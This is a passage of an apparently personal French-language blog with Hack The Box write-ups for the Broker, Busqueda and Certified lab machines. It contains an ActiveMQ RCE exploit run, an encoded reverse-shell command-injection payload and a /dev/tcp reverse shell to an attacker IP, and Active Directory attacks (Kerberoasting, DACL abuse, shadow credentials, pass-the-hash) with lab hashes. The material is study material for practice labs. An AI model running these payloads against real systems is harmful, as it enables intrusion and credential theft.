OpenWire transport | fingerprint-strings: | NULL: | ActiveMQ | TcpNoDelayEnabled | SizePrefixDisabled | CacheSize | ProviderName | ActiveMQ | StackTraceEnabled | PlatformDetails | Java | CacheEnabled | TightEncodingEnabled | MaxFrameSize | MaxInactivityDuration | MaxInactivityDurationInitalDelay | ProviderVersion |_ 5.15.15 Foothold Apache ActiveMQ Server (CVE-2023-46604) On utilise le login admin/admin pour se connecter : Sur la page principale, on remarque le numero de verion : Apache ActiveMQ 5.15.15\nAprès une petite recherche sur internet on trouve rapidement une CVE avec un repo github permettant de l\u0026rsquo;exploiter : https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ?tab=readme-ov-file\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 ./exploit -i 10.10.11.243 -u http://10.10.16.10:8001/poc-linux.xml _ _ _ __ __ ___ ____ ____ _____ / \\ ___| |_(_)_ _____| \\/ |/ _ \\ | _ \\ / ___| ____| / _ \\ / __| __| \\ \\ / / _ \\ |\\/| | | | |_____| |_) | | | _| / ___ \\ (__| |_| |\\ V / __/ | | | |_| |_____| _ \u0026lt;| |___| |___ /_/ \\_\\___|\\__|_| \\_/ \\___|_| |_|\\__\\_\\ |_| \\_\\\\____|_____| [*] Target: 10.10.11.243:61616 [*] XML URL: http://10.10.16.10:8001/poc-linux.xml [*] Sending packet: 000000781f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010025687474703a2f2f31302e31302e31362e31303a383030312f706f632d6c696e75782e786d6c ------------------------------------------------------------------------------ python3 -m http.server 8001 Serving HTTP on 0.0.0.0 port 8001 (http://0.0.0.0:8001/) ... 10.10.11.243 - - [12/Dec/2024 00:19:59] \u0026#34;GET /poc-linux.xml HTTP/1.1\u0026#34; 200 - 10.10.11.243 - - [12/Dec/2024 00:19:59] \u0026#34;GET /poc-linux.xml HTTP/1.1\u0026#34; 200 - 10.10.11.243 - - [12/Dec/2024 00:19:59] \u0026#34;GET /test.elf HTTP/1.1\u0026#34; 200 - 10.10.11.243 - - [12/Dec/2024 00:20:15] \u0026#34;GET /poc-linux.xml HTTP/1.1\u0026#34; 200 - 10.10.11.243 - - [12/Dec/2024 00:20:15] \u0026#34;GET /poc-linux.xml HTTP/1.1\u0026#34; 200 - 10.10.11.243 - - [12/Dec/2024 00:20:15] \u0026#34;GET /test.elf HTTP/1.1\u0026#34; 200 - ------------------------------------------------------------------------------ $ nc -lnvp 8888 ... activemq@broker:/opt/apache-activemq-5.15.15/bin$ cat ~/user.tdxt cat: /home/activemq/user.tdxt: No such file or directory activemq@broker:/opt/apache-activemq-5.15.15/bin$ cat ~/user.txt 9e54.....9a86 activemq@broker:/opt/apache-activemq-5.15.15/bin$ Privilege Escalation nginx as root En faisant sudo -l, on observe que l\u0026rsquo;on peut executer la commande nginx en tant que root. Avec cette commande, on peut relancer un deuxieme serveur nginx sur un autre port en lui passant un nouveau fichier de configuration. La méthode, consiste donc à modifier l\u0026rsquo;utilisateur dans le fichier de configuration pour que l\u0026rsquo;interaction avec les fichiers se fassent en tant que root.\nSi on se connecte en HTTP à l\u0026rsquo;ip du serveur avec le port défini dans la configuration nous allons pouvoir ouvrir tous les fichiers de l\u0026rsquo;ordinateur, et donc notamment le fichier root.txt contenant le flag.\n1 ...................... ","date":"2024-12-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/broker-htb/","title":"HTB | Broker"},{"content":" Machine name OS IP Difficulty Busqueda Linux 10.10.11.208 Easy Enumeration nmap 1 2 3 4 5 6 nmap -sC -sV -An -p- 10.10.11.208 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.52 |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Did not follow redirect to http://searcher.htb/ Foothold Python Command injection 1 2 3 4 5 6 ## exploit \u0026#39;,__import__(\u0026#39;os\u0026#39;).system(\u0026#39;echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTAvOTAwMSAwPiYx | base64 -d | bash -i\u0026#39;)) # junky comment $ nc -lnvp 9001 svc@busqueda:~$ cat user.txt afb3.....29e5 Gitea : svc password On peut voir que l\u0026rsquo;application a un .git et est donc un repo git. On recupère le lien vers le serveur gitea.searcher.htb. Dans le fichier de config de .git on trouve des credentials pour le nouveau site web découvert qui tourne sur le port 3000\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 svc@busqueda:/var/www/app$ git log commit 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 (HEAD -\u0026gt; main, origin/main) Author: administrator \u0026lt;administrator@gitea.searcher.htb\u0026gt; # \u0026lt;---------------- \u0026#34;gitea.searcher.htb\u0026#34; Date: Sun Dec 25 12:14:21 2022 +0000 Initial commit svc@busqueda:/var/www/app/$ cd .git ## credentials svc@busqueda:/var/www/app/.git$ cat config [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote \u0026#34;origin\u0026#34;] url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git fetch = +refs/heads/*:refs/remotes/origin/* [branch \u0026#34;main\u0026#34;] remote = origin merge = refs/heads/main En vérité j\u0026rsquo;ai trouvé les creds comme ça:\n1 2 3 4 5 6 7 grep -rni \u0026#34;gitea\u0026#34; app/.git/logs/HEAD:1:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator \u0026lt;administrator@gitea.searcher.htb\u0026gt; 1671970461 +0000\tcommit (initial): Initial commit app/.git/logs/refs/heads/main:1:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator \u0026lt;administrator@gitea.searcher.htb\u0026gt; 1671970461 +0000\tcommit (initial): Initial commit app/.git/logs/refs/remotes/origin/main:1:0000000000000000000000000000000000000000 5ede9ed9f2ee636b5eb559fdedfd006d2eae86f4 administrator \u0026lt;administrator@gitea.searcher.htb\u0026gt; 1671970461 +0000\tupdate by push ## ICI app/.git/config:7:\turl = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git User: cody:jh1usoih2bkjaspwe92\nOn essaye de se connecter en ssh avec cody, puis avec svc et le password de cody, et ca fonctionne !\n1 ssh svc@10.10.11.208 Root Privilege Escalation 1 2 3 4 5 6 $ sudo -l Matching Defaults entries for svc on busqueda: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty User svc may run the following commands on busqueda: (root) /usr/bin/python3 /opt/scripts/system-checkup.py * On peut voir que lorsqu\u0026rsquo;on execute system-checkup on peut voir des containers docker, et envoyer des commande spour obtenir plus d\u0026rsquo;informations\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py aaaa Usage: /opt/scripts/system-checkup.py \u0026lt;action\u0026gt; (arg1) (arg2) docker-ps : List running docker containers docker-inspect : Inpect a certain docker container full-checkup : Run a full system checkup svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 960873171e2e gitea/gitea:latest \u0026#34;/usr/bin/entrypoint…\u0026#34; 23 months ago Up 7 hours 127.0.0.1:3000-\u0026gt;3000/tcp, 127.0.0.1:222-\u0026gt;22/tcp gitea f84a6b33fb5a mysql:8 \u0026#34;docker-entrypoint.s…\u0026#34; 23 months ago Up 7 hours 127.0.0.1:3306-\u0026gt;3306/tcp, 33060/tcp mysql_db $ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect \u0026#39;{{json .Config.Env}}\u0026#39; mysql_db [\u0026#34;MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF\u0026#34;,\u0026#34;MYSQL_USER=gitea\u0026#34;,\u0026#34;MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh\u0026#34;,\u0026#34;MYSQL_DATABASE=gitea\u0026#34;,\u0026#34;PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\u0026#34;,\u0026#34;GOSU_VERSION=1.14\u0026#34;,\u0026#34;MYSQL_MAJOR=8.0\u0026#34;,\u0026#34;MYSQL_VERSION=8.0.31-1.el8\u0026#34;,\u0026#34;MYSQL_SHELL_VERSION=8.0.31-1.el8\u0026#34;] On trouve le mot de passe root dans les variables d\u0026rsquo;environnement du docker mysql.\nCe mot de passe peut etre utilisé pour le compte administrator sur le site web gitea.searcher.htb !\nOn peut voir un nouveau repo git avec le code complet du fameux script system-checkup.py\n1 2 3 4 5 6 7 8 svc@busqueda:~$ vim full-checkup.sh ##!/bin/bash cat /root/root.txt svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup 52e6.....04a7 [+] Done ! On peut aussi utiliser un reverse shell avec ce code pour full-checkup.sh:\n1 2 ##!/bin/bash sh -i \u0026gt;\u0026amp; /dev/tcp/10.10.16.10/9001 0\u0026gt;\u0026amp;1 ","date":"2024-12-11T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/busqueda-htb/","title":"HTB | Busqueda"},{"content":" Machine name OS IP Difficulty Certified Windows 10.10.11.41 Medium Users 1 2 3 4 User : judith.mader, Password : judith09 User : management_svc, NT hash : a091c1832bcdd4677c28b5a6a1295584 User : ca_operator, NT hash : 94994b74f29662fc4d702f2f3b0df327 User : Administrator, LM/NT hash : aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 nmap 10.10.11.41 -Pn Starting Nmap 7.80 ( https://nmap.org ) at 2024-12-08 14:07 CET Nmap scan report for 10.10.11.41 Host is up (0.060s latency). Not shown: 992 filtered ports PORT STATE SERVICE 53/tcp open domain 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 636/tcp open ldapssl 3269/tcp open globalcatLDAPssl Enumerating Users - smb 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 nxc smb 10.10.11.41 -u \u0026#39;judith.mader\u0026#39; -p \u0026#39;judith09\u0026#39; -d \u0026#39;certified.htb\u0026#39; --rid-brute SMB 10.10.11.41 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) SMB 10.10.11.41 445 DC01 [+] certified.htb\\judith.mader:judith09 SMB 10.10.11.41 445 DC01 498: CERTIFIED\\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 500: CERTIFIED\\Administrator (SidTypeUser) SMB 10.10.11.41 445 DC01 501: CERTIFIED\\Guest (SidTypeUser) SMB 10.10.11.41 445 DC01 502: CERTIFIED\\krbtgt (SidTypeUser) SMB 10.10.11.41 445 DC01 512: CERTIFIED\\Domain Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 513: CERTIFIED\\Domain Users (SidTypeGroup) SMB 10.10.11.41 445 DC01 514: CERTIFIED\\Domain Guests (SidTypeGroup) SMB 10.10.11.41 445 DC01 515: CERTIFIED\\Domain Computers (SidTypeGroup) SMB 10.10.11.41 445 DC01 516: CERTIFIED\\Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 517: CERTIFIED\\Cert Publishers (SidTypeAlias) SMB 10.10.11.41 445 DC01 518: CERTIFIED\\Schema Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 519: CERTIFIED\\Enterprise Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 520: CERTIFIED\\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.11.41 445 DC01 521: CERTIFIED\\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 522: CERTIFIED\\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.11.41 445 DC01 525: CERTIFIED\\Protected Users (SidTypeGroup) SMB 10.10.11.41 445 DC01 526: CERTIFIED\\Key Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 527: CERTIFIED\\Enterprise Key Admins (SidTypeGroup) SMB 10.10.11.41 445 DC01 553: CERTIFIED\\RAS and IAS Servers (SidTypeAlias) SMB 10.10.11.41 445 DC01 571: CERTIFIED\\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.41 445 DC01 572: CERTIFIED\\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.41 445 DC01 1000: CERTIFIED\\DC01$ (SidTypeUser) SMB 10.10.11.41 445 DC01 1101: CERTIFIED\\DnsAdmins (SidTypeAlias) SMB 10.10.11.41 445 DC01 1102: CERTIFIED\\DnsUpdateProxy (SidTypeGroup) SMB 10.10.11.41 445 DC01 1103: CERTIFIED\\judith.mader (SidTypeUser) SMB 10.10.11.41 445 DC01 1104: CERTIFIED\\Management (SidTypeGroup) SMB 10.10.11.41 445 DC01 1105: CERTIFIED\\management_svc (SidTypeUser) SMB 10.10.11.41 445 DC01 1106: CERTIFIED\\ca_operator (SidTypeUser) SMB 10.10.11.41 445 DC01 1601: CERTIFIED\\alexander.huges (SidTypeUser) SMB 10.10.11.41 445 DC01 1602: CERTIFIED\\harry.wilson (SidTypeUser) SMB 10.10.11.41 445 DC01 1603: CERTIFIED\\gregory.cameron (SidTypeUser) Bloodhound-python On execute bloodhound-python pour récupérer des données sur l\u0026rsquo;Active directory.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 sudo bloodhound-python -d CERTIFIED.HTB -u \u0026#39;judith.mader\u0026#39; -p \u0026#39;judith09\u0026#39; -dc certified.htb -c All --zip -ns 10.10.11.41 INFO: Found AD domain: certified.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) INFO: Connecting to LDAP server: certified.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 2 computers INFO: Connecting to LDAP server: certified.htb INFO: Found 10 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: INFO: Querying computer: DC01.certified.htb INFO: Done in 00M 07S INFO: Compressing output into 20241208115439_bloodhound.zip Foothold Targeted Kerberoasting D\u0026rsquo;après ce qu\u0026rsquo;on observe sur bloodhound, on peut voir que l\u0026rsquo;utilisateur management_svc peut potentiellement être récupéré à l\u0026rsquo;aide d\u0026rsquo;une attaque \u0026ldquo;targeted Kerberoasting\u0026rdquo;. A l\u0026rsquo;aide de l\u0026rsquo;outil targetedKerberoast.py, on effectue l\u0026rsquo;attaque et on récupére le hash du mot de passe de management_svc :\n1 2 3 4 5 targetedKerberoast.py -d certified.htb -u judith.mader -p judith09 -v [*] Starting kerberoast attacks [*] Fetching usernames from Active Directory with LDAP [+] Printing hash for (management_svc) $krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$98e6a7443e6760f44cdd6b7a9ff0cdc8$21d6889b72b0eae33c5f4eb81af29e699b45b48284cde10ae2fdc23a1c929a5f5ccb8c88ef7c9a6f14552b848d42791d0c4f0827621e3fbd06abfb0fe5d41b2754443a76c8abe11350c929d8b6251f927222c0f1c7339620a15866b2f3714d5ab15cdb2893b13daf6db594aa4259d89028198d886c697997cc443afe9f8a09361736573565ebfa264a03c5d00ffb2377898d0c6087385d3b895ecb7e5ae11ac37875409b1bb574350707d049e5aad147b5a36c1172ea4d4deb2f7c62e5bfb75edcbb475e59a34ee8255b9262b39449625a05185526829e7437e9078253741d3bcb130325ad4e07ca41a2436a29020d467f67e4ff16e5be22a04b30317be8dc773f11374aabea10e4e669146698d0c558a060e27ac55554121cc26d7050172044810850793699c631a46cb33af8650b940c3b7676bd397c47cd7b27dd62f15d2b4fe8ca2c741bad98335af2be77ec06317d2ca3e5fb32bad8c3cc599cc2f62fc5a3e1124501ca010fe529d00e87babcaadbb8fb331d9027c999c9d30ad828613f25e782acc721d3842db14020713fcddded15996c195da468a14aa2cf2595f94c305d68d25d91579ec569e226627f15b0b7c5df2fd4306a8b5425e553711f321f3f40d0e9d65bcf77d20db59fea66a66b01ff383af30e7541ace8c20266199fd9ea56a54a5aade2859bd463b386eb754a8eb2c7202b3575adc3e1d8fb9231d93fab04039d4a7f07a9b79ffe00fa9c5c786404c68742e822a84af136cd472f6168621dfa4817312bdc08eb5e070a69842b15bbbea8a503f101043e1981cda2e0df4008c52d41b0e2805d8616c08b025eea8fc230b1b983322be2060f18da2ee9d832769ef53dcbd6d27bed287c55ed73be5678e21f52c4d3703a90d65a340e573648f43bf60a8194975516d2e70b69522f24d4aa713a20ba0d84efa776eb7886113456c77cb1cb535cb741ff651caf111ecec2f8d63a37d544035e2acf72298024415ee49f00037ee3e0a5653643a48675d355c7fd911f728fa3b9933c14919828bc74e689c523c7602a03413105f8c8aee518c6458ad4f2fcdcc8859ebca960a39b37987c7ac6a8d3f0bb8ca06b82f7e3afc3bb0d9777e852fb0a6ccdaf9a7897632d5c1ff7a7524f1ccd06da51b1ffeaeeca9b1b9ef827b7ec9de56af9af28093990983c4bc1543229c1b886b802286d606aca8fd2f1decc07b25f241fdd287975d6db4d32e472ae89700764a5e5a5cefb977ac106431fa8f435bf2c420a00528aaaa9237a286ff433be4ce8eb458cdcab450003ee0c5d49ce6c069cc40c48ed721c3a07b42e470991321b322475f9aef94c3e488b62289793fb3dac6c56cad4ebb95189c8864d2b7425047f5e4fd8f71d029f6e7df1caea05089da8a024bca18c34d92c52cb5d2bc19a4578ec9e872285fccabbdf54cff68968cff90ac592f247928bd27fcbb89b45a75ae00351ca654b9a978c213e52bbca509eeb5c34c520f94c5d394b2dee91988bddb8d7a6e1f61732d961c42ad33b76b46122f2e4a55dce6abf450d64180b6ff2394a59418668bf79f6d34af701fd1e98 Shadow credential attack Grant ownership : It has the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object. The attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. On va donc rendre judith.mader owner du groupe 1 2 3 4 5 6 7 python3 owneredit.py -new-owner \u0026#39;judith.mader\u0026#39; -target \u0026#39;management\u0026#39; -dc-ip 10.10.11.41 -action write \u0026#39;certified.htb\u0026#39;/\u0026#39;judith.mader\u0026#39;:\u0026#39;judith09\u0026#39; [*] Current owner information below [*] - SID: S-1-5-21-729746778-2675978091-3820388244-512 [*] - sAMAccountName: Domain Admins [*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb [*] OwnerSid modified successfully! Puis :\nModifying the rights To abuse ownership of a group object, you may grant yourself the AddMember privilege. 1 2 3 4 5 6 7 8 9 dacledit.py -action \u0026#39;write\u0026#39; -rights \u0026#39;WriteMembers\u0026#39; -principal \u0026#39;judith.mader\u0026#39; -target \u0026#39;management\u0026#39; \u0026#39;certified.htb\u0026#39;/\u0026#39;judith.mader\u0026#39;:\u0026#39;judith09\u0026#39; [*] DACL backed up to dacledit-20241209-130331.bak [*] DACL modified successfully! ## Cependant, après verification ca n\u0026#39;a pas fonctionné. Par contre j\u0026#39;ai pu me donner le controle totale a l\u0026#39;aide de cette commande dacledit.py -action \u0026#39;write\u0026#39; -rights \u0026#39;FullControl\u0026#39; -principal \u0026#39;judith.mader\u0026#39; -target \u0026#39;management\u0026#39; \u0026#39;certified.htb\u0026#39;/\u0026#39;judith.mader\u0026#39;:\u0026#39;judith09\u0026#39; ## Pour vérifier les droits des utilisateur sur un groupe/objet, on peut utiliser cette commande dacledit.py -action \u0026#39;read\u0026#39; -target \u0026#39;management\u0026#39; \u0026#39;certified.htb\u0026#39;/\u0026#39;judith.mader\u0026#39;:\u0026#39;judith09\u0026#39; | grep judith -A 3 -B 3 Enfin :\nAdding to the group You can now add members to the group. On va donc s\u0026rsquo;ajouter comme membre du groupe : judith.mader. 1 net rpc group addmem \u0026#34;management\u0026#34; \u0026#34;judith.mader\u0026#34; -U \u0026#34;certified.htb\u0026#34;/\u0026#34;judith.mader\u0026#34;%\u0026#34;judith09\u0026#34; -S \u0026#34;certified.htb\u0026#34; Maintenant que judith.mader est membre du groupe, on va enfin pouvoir faire une \u0026lsquo;shadow credential attack\u0026rsquo; pour obtenir le hash NT de management_svc :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 certipy-ad shadow auto -username judith.mader@certified.htb -p judith09 -dc-ip 10.10.11.41 -account management_svc -debug [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.41:636 - ssl [+] Default path: DC=certified,DC=htb [+] Configuration path: CN=Configuration,DC=certified,DC=htb [*] Targeting user \u0026#39;management_svc\u0026#39; [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID \u0026#39;8438746f-c951-b3d9-9be0-c455cedf6731\u0026#39; \u0026lt;KeyCredential structure at 0x7f711d6a6900\u0026gt; | Owner: CN=management service,CN=Users,DC=certified,DC=htb | Version: 0x200 | KeyID: KcbU1P0bMaVuWjpricPI4cNFK5+qjRkV4gYbM4DfPP0= | KeyHash: 64a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d | RawKeyMaterial: \u0026lt;dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7f711d6a68a0\u0026gt; | | Exponent (E): 65537 | | Modulus (N): 0x920669e7366de61569081a4de24445dc45e6856c747d69ce86cd15dadcf516effc4c3543cb7e96487a3b5390c05b76ef5f1d1c0f2266803ffec550d281a108c2f594d21f4ce33abb612532f88560b6627b7dbe21247ec565e51d7b07b3bcfcbc858c91defaf7ee39e6ee7725d9df0ba759fbabc0ebea062c2c4adc03e6bb2459a7e285ed37eefeaaa91a0fd2de40114879e3d7b286646dfd0d6448a83b900eb7acc4b75345b61eefe66688de7a1425706c889a9e978ffcf2eb4456646c410454680341338a19214f690ffad5258b39cdbf000cbdbd0620d233aab9a431845148283d6fb6b5ae0c784a00938d72e00a254929a0fce6c922422d17abe8f57e8e69 | | Prime1 (P): 0x0 | | Prime2 (Q): 0x0 | Usage: KeyUsage.NGC | LegacyUsage: None | Source: KeySource.AD | DeviceId: 8438746f-c951-b3d9-9be0-c455cedf6731 | CustomKeyInfo: \u0026lt;CustomKeyInformation at 0x7f711d6968f0\u0026gt; | | Version: 1 | | Flags: KeyFlags.NONE | | VolumeType: None | | SupportsNotification: None | | FekKeyVersion: None | | Strength: None | | Reserved: None | | EncodedExtendedCKI: None | LastLogonTime (UTC): 2024-12-10 04:23:52.735565 | CreationTime (UTC): 2024-12-10 04:23:52.735565 [+] Key Credential: B:828:0002000020000129c6d4d4fd1b31a56e5a3a6b89c3c8e1c3452b9faa8d1915e2061b3380df3cfd20000264a54a908329ffbd4746b1dabf32b65a35a9a107e4851235de8948687e0cf69d1b0103525341310008000003000000000100000000000000000000010001920669e7366de61569081a4de24445dc45e6856c747d69ce86cd15dadcf516effc4c3543cb7e96487a3b5390c05b76ef5f1d1c0f2266803ffec550d281a108c2f594d21f4ce33abb612532f88560b6627b7dbe21247ec565e51d7b07b3bcfcbc858c91defaf7ee39e6ee7725d9df0ba759fbabc0ebea062c2c4adc03e6bb2459a7e285ed37eefeaaa91a0fd2de40114879e3d7b286646dfd0d6448a83b900eb7acc4b75345b61eefe66688de7a1425706c889a9e978ffcf2eb4456646c410454680341338a19214f690ffad5258b39cdbf000cbdbd0620d233aab9a431845148283d6fb6b5ae0c784a00938d72e00a254929a0fce6c922422d17abe8f57e8e6901000401010005001000066f74388451c9d9b39be0c455cedf67310200070100080008fb78af51bb4adb01080009fb78af51bb4adb01:CN=management service,CN=Users,DC=certified,DC=htb [*] Adding Key Credential with device ID \u0026#39;8438746f-c951-b3d9-9be0-c455cedf6731\u0026#39; to the Key Credentials for \u0026#39;management_svc\u0026#39; [*] Successfully added Key Credential with device ID \u0026#39;8438746f-c951-b3d9-9be0-c455cedf6731\u0026#39; to the Key Credentials for \u0026#39;management_svc\u0026#39; [*] Authenticating as \u0026#39;management_svc\u0026#39; with the certificate [*] Using principal: management_svc@certified.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to \u0026#39;management_svc.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;management_svc\u0026#39; [*] Restoring the old Key Credentials for \u0026#39;management_svc\u0026#39; [*] Successfully restored the old Key Credentials for \u0026#39;management_svc\u0026#39; [*] NT hash for \u0026#39;management_svc\u0026#39;: a091c1832bcdd4677c28b5a6a1295584 On obtient le hachage NT pour l\u0026rsquo;utilisateur management_svc !\nWinRm connexion avec le hachage NT (Pass-The-Hash) - user flag 1 2 3 4 5 6 7 8 9 10 11 12 evil-winrm -i 10.10.11.41 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\management_svc\\Documents\u0026gt; cd ../Desktop *Evil-WinRM* PS C:\\Users\\management_svc\\Desktop\u0026gt; cat user.txt 423f.....d084 Shadow Credentials attack : management_svc -\u0026gt; ca_operator On effectue à nouveau une shadow credential attack pour récupérer le hachage NT de l\u0026rsquo;utilisateur ca_operator. Pour cela on utilise l\u0026rsquo;utilisateur management_svc avec son hachage NT (option -hashes au lieu du mot de passe qu\u0026rsquo;on ne connait -p) :\n1 2 3 4 5 6 7 8 9 10 11 certipy-ad shadow auto -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41 -account ca_operator -debug [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.41:636 - ssl [+] Default path: DC=certified,DC=htb [+] Configuration path: CN=Configuration,DC=certified,DC=htb [*] Targeting user \u0026#39;ca_operator\u0026#39; ... ... [*] Successfully restored the old Key Credentials for \u0026#39;ca_operator\u0026#39; [*] NT hash for \u0026#39;ca_operator\u0026#39;: 13b29964cc2480b4ef454c59562e675c ### Nouveau bloodhound avec l\u0026rsquo;utilisateur ca_operator\n1 sudo bloodhound-python -d CERTIFIED.HTB -u \u0026#39;ca_operator\u0026#39; -p \u0026#39;P@ssword\u0026#39; -dc certified.htb -c All --zip -ns 10.10.11.41 Bruteforce hashcat du hachage NT On obtient le mot de passe de l\u0026rsquo;utilisateur ca_operator grâce à hashcat et la wordlist rockyou.txt :\n1 2 hashcat -m 1000 -a 0 hash.txt ~/wordlists/rockyou.txt --show 13b29964cc2480b4ef454c59562e675c:P@ssword Privilege Escalation Bloodhound PE Path Checking vuln in certificates / templates with ca_operator On observe que management_svc à le droit CanPSRemote sur la machine DC01 :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 certipy-ad find -vulnerable -stdout -u ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327:94994b74f29662fc4d702f2f3b0df327 -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve \u0026#39;CERTIFIED.HTB\u0026#39; at \u0026#39;10.0.2.3\u0026#39; [+] Resolved \u0026#39;CERTIFIED.HTB\u0026#39; from cache: 10.10.11.41 [+] Authenticating to LDAP server [+] Bound to ldaps://10.10.11.41:636 - ssl [+] Default path: DC=certified,DC=htb [+] Configuration path: CN=Configuration,DC=certified,DC=htb [+] Adding Domain Computers to list of current user\u0026#39;s SIDs [+] List of current user\u0026#39;s SIDs: CERTIFIED.HTB\\Domain Users (S-1-5-21-729746778-2675978091-3820388244-513) CERTIFIED.HTB\\Authenticated Users (CERTIFIED.HTB-S-1-5-11) CERTIFIED.HTB\\Domain Computers (S-1-5-21-729746778-2675978091-3820388244-515) CERTIFIED.HTB\\Everyone (CERTIFIED.HTB-S-1-1-0) CERTIFIED.HTB\\operator ca (S-1-5-21-729746778-2675978091-3820388244-1106) CERTIFIED.HTB\\Users (CERTIFIED.HTB-S-1-5-32-545) [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [+] Trying to resolve \u0026#39;DC01.certified.htb\u0026#39; at \u0026#39;10.0.2.3\u0026#39; [!] Failed to resolve: DC01.certified.htb [*] Trying to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; via CSRA [+] Trying to get DCOM connection for: DC01.certified.htb [!] Got error while trying to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; via CSRA: [Errno -2] Name or service not known [*] Trying to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; via RRP [!] Got error while trying to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; via RRP: [Errno Connection error (DC01.certified.htb:445)] [Errno -2] Name or service not known [!] Failed to get CA configuration for \u0026#39;certified-DC01-CA\u0026#39; 